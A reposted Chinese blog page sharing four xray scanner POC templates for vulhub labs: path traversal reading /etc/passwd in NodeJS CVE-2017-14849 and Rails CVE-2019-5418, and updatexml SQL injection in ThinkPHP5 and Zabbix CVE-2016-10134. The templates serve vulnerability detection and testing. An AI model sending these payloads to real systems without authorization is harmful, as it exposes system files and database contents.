zoukankan      html  css  js  c++  java
  • xray写POC踩坑

    错误记录

    NodeJS_path-validation_CVE-2017-14849.yml

    
    name: NodeJS_path-validation_CVE-2017-14849
    rules:
      - method: GET
        path: /static/../../../a/../../../../etc/passwd
        headers:
          Accept: ''
        follow_redirects: false
        expression: |
          status==200 && body.bcontains(b'root:x:0:0')
    detail:
      author: 17bdw
      Affected Version: "NodeJS 8.5.0"
      links:
        - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
    
    

    Rails_file_content_disclosure_CVE-2019-5418

    name: Rails_file_content_disclosure_CVE-2019-5418
    rules:
      - method: GET
        path: /robots
        headers:
          Accept: '../../../../../../../../etc/passwd{{'
        follow_redirects: false
        expression: |
          status==200 && body.bcontains(b'root:x:0:0')
    detail:
      author: 17bdw
      Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
      links:
        - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
    

    thinkphp5-in-sqlinjection

    name: thinkphp5-in-sqlinjection
    rules:
      - method: GET
        path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
        expression: |
          body.bcontains(b'cf79ae6addba60ad018347359bd144d')
    detail:
      author: 17bdw
      Affected Version: "thinkphp5-in-sqlinjection"
      vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
      links:
        - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
    

    zabbix_3.0.3_jsrpc.php_CVE-2016-10134

      
    name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
    rules:
      - method: GET
        path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
        expression: |
          body.bcontains(b'cf79ae6addba60ad018347359bd144d')
    detail:
      author: 17bdw
      Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
      vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
      links:
        - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
    
  • 相关阅读:
    兼容Android 和 ios JavaScript copy paste
    hello-循环神经网络(RNN)原理
    236. Lowest Common Ancestor of a Binary Tree
    Tensorflow 之模型内容可视化
    CUDA,cudnn一些常见版本问题
    MongoDB国内学术研究(部分)
    Unsupported major.minor version 52.0
    WebService的两种方式SOAP和REST比较
    廖雪峰老师的git在线教程
    MAVEN ERROR : Dynamic Web Module 3.0 requires Java 1.6 or newer
  • 原文地址:https://www.cnblogs.com/17bdw/p/11515741.html
Copyright © 2011-2022 走看看